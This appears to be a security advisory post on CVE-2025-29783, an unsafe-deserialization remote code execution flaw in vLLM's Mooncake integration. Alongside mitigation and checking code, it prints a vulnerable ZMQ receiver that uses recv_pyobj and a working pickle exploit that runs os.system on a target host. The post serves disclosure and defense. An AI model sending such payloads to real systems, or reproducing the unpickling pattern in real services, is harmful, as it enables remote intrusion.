CVE-2025-29783 - Remote Code Execution Vulnerability in vLLM using Mooncake Configuration

In this post, we discuss CVE-2025-29783, a critical vulnerability in vLLM, a high-throughput and memory-efficient inference and serving engine for large language models (LLMs). When vLLM is configured to use Mooncake to distribute the key-value (KV) cache across hosts, an attacker who can reach the exposed port can execute code remotely on those hosts. We examine the details of this vulnerability and explain how to mitigate it.

Description

vLLM is designed to scale efficiently across multiple machines, making it a popular choice among developers for serving large language models. In a distributed deployment, the Mooncake integration is responsible for moving KV cache data between hosts.

CVE-2025-29783 stems from unsafe deserialization in the communication between vLLM and Mooncake: the receiving socket is exposed directly over ZMQ/TCP on all network interfaces and deserializes whatever it receives. An attacker who can reach that port can send a specially crafted message over the network and execute code on the targeted machine.
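
To make the "all network interfaces" part concrete, here is a minimal sketch of a check that flags ZMQ TCP endpoints bound to a wildcard host. The function name `binds_all_interfaces` and the set of wildcard hosts are assumptions made for illustration; they are not part of vLLM or Mooncake.

```python
# Hosts that make a ZMQ TCP socket listen on every network interface.
WILDCARD_HOSTS = {"*", "0.0.0.0"}


def binds_all_interfaces(endpoint: str) -> bool:
    """Return True if a ZMQ endpoint such as 'tcp://*:8888' binds every interface."""
    scheme, sep, rest = endpoint.partition("://")
    if sep == "" or scheme != "tcp":
        # Non-TCP transports (ipc, inproc) are not reachable over the network.
        return False
    # Split off the port; what remains is the host part of the endpoint.
    host, _, _port = rest.rpartition(":")
    return host in WILDCARD_HOSTS


for endpoint in ("tcp://*:8888", "tcp://127.0.0.1:8888"):
    print(endpoint, "->", binds_all_interfaces(endpoint))
```

An endpoint bound to a loopback or private address is reachable by far fewer peers than a wildcard bind, which is why the bind address matters as much as the deserialization itself.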

Exploit Details

To understand the vulnerability better, let's look at a simplified code snippet that illustrates the unsafe deserialization pattern:

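import zmq

# Context used for ZMQ communication
context = zmq.Context()

# Address for receiving messages.
# "*" binds to every network interface, not only a private one.
recv_addr = 'tcp://*:8888'

# Create a REP socket and bind it to recv_addr
socket_recv = context.socket(zmq.REP)
socket_recv.bind(recv_addr)


def process_msg(msg):
    # Placeholder for the application's message handling
    print(f"Received: {msg!r}")


while True:
    try:
        # recv_pyobj() calls pickle.loads() on the received bytes, so code
        # embedded in a payload has already run by the time this call returns
        recv_msg = socket_recv.recv_pyobj()
        process_msg(recv_msg)
        # A REP socket must send a reply before it can receive again
        socket_recv.send(b'ok')
    except Exception as e:
        # Handle exceptions
        print(f"Error: {e}")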

Because recv_pyobj() unpickles whatever bytes it receives, an attacker only needs to send a malicious pickle payload over the ZMQ/TCP connection to execute arbitrary code remotely. Here's an example of an exploit payload:

import zmq
import pickle
import os

# Target vLLM instance's address
target_addr = 'tcp://target.example.com:8888'

# Malicious payload that writes a file with arbitrary content
class MaliciousPayload:
    def __reduce__(self):
        return (os.system, ('echo "You have been hacked" > /tmp/hacked.txt',))

# Serialize the malicious payload
payload = pickle.dumps(MaliciousPayload())

# Send the payload to the target's address
context = zmq.Context()
socket_send = context.socket(zmq.REQ)
socket_send.connect(target_addr)
socket_send.send(payload)

In this example, unpickling the payload on the target runs a shell command that writes "You have been hacked" to /tmp/hacked.txt, demonstrating arbitrary code execution.
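
The mechanism can be reproduced locally and harmlessly. The following is a minimal sketch in which the class `HarmlessDemo` (a made-up name) stands in for a malicious object and calls the built-in sorted() instead of a shell command. It shows that the callable returned by `__reduce__` runs inside pickle.loads(), before the receiving application inspects the message at all.

```python
import pickle


class HarmlessDemo:
    """Stand-in for a malicious object; it only calls the built-in sorted()."""

    def __reduce__(self):
        # pickle stores "call sorted([3, 1, 2])" instead of the object's state.
        return (sorted, ([3, 1, 2],))


data = pickle.dumps(HarmlessDemo())

# sorted() is invoked here, during deserialization on the receiving side.
result = pickle.loads(data)

# The receiver gets the return value of the call, not a HarmlessDemo instance.
print(type(result).__name__, result)
```

Replacing sorted with os.system, as the exploit does, is the only difference between this demonstration and a real attack.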

Affected Versions

Any vLLM deployment that uses Mooncake to distribute the KV cache across hosts and runs a release without the fix is affected. This CVE concerns only the Mooncake integration.
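
As a rough aid for auditing hosts, the sketch below compares a vLLM version string against 0.8.0, the release in which the CVE record says the issue is fixed. The helper names `parse_release` and `predates_fix` are hypothetical, and the check is deliberately conservative: it treats every earlier release as potentially affected and does not distinguish pre-release tags.

```python
import re

# Release that contains the fix, per the CVE record.
FIXED_VERSION = (0, 8, 0)


def parse_release(version: str) -> tuple:
    """Extract the leading numeric release, e.g. '0.7.3.post1' -> (0, 7, 3)."""
    match = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", version)
    if match is None:
        raise ValueError(f"unrecognized version string: {version!r}")
    # A missing patch component is treated as 0.
    return tuple(int(part or 0) for part in match.groups())


def predates_fix(version: str) -> bool:
    """Return True if the release is older than the fixed version."""
    return parse_release(version) < FIXED_VERSION


for candidate in ("0.7.3", "0.8.0", "0.10.1"):
    print(candidate, "predates fix:", predates_fix(candidate))
```

On a real host, the installed version string can be read with importlib.metadata.version("vllm") and passed to predates_fix(). A True result matters only if the Mooncake integration is actually enabled.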

Solution

The vulnerability has been patched in vLLM version 0.8.0. We strongly recommend upgrading your vLLM installations to 0.8.0 or later as soon as possible. The patch addresses the unsafe deserialization, closing the attack vector.
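
For services of your own that receive messages over ZMQ, the general defense is to avoid pickle for untrusted input and use a data-only format instead. The following is a minimal sketch of that idea using JSON with an explicit shape check. It is not the vLLM patch; the message schema (`request_id`, `payload`) and the function name `decode_message` are assumptions made for illustration.

```python
import json

# Hypothetical message schema: exactly these two keys are accepted.
ALLOWED_KEYS = {"request_id", "payload"}


def decode_message(raw: bytes) -> dict:
    """Parse an untrusted message as JSON and validate its structure."""
    try:
        msg = json.loads(raw.decode("utf-8"))
    except (UnicodeDecodeError, json.JSONDecodeError) as exc:
        raise ValueError("message is not valid UTF-8 JSON") from exc
    if not isinstance(msg, dict) or set(msg) != ALLOWED_KEYS:
        raise ValueError("unexpected message structure")
    if not isinstance(msg["request_id"], str):
        raise ValueError("request_id must be a string")
    return msg


print(decode_message(b'{"request_id": "r1", "payload": [1, 2]}'))
```

With pyzmq, the raw bytes would come from socket.recv() rather than recv_pyobj(). JSON parsing yields only plain data types, so a crafted message can at worst be rejected; it cannot trigger a call chosen by the sender.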

Conclusion

This post discussed CVE-2025-29783, a remote code execution vulnerability affecting vLLM when it is configured to use Mooncake. By understanding the exploit details and how to mitigate the vulnerability, you can ensure that your vLLM deployments are secure against potential attacks.

Timeline

Published on: 03/19/2025 16:15:32 UTC
Last modified on: 03/22/2025 01:15:30 UTC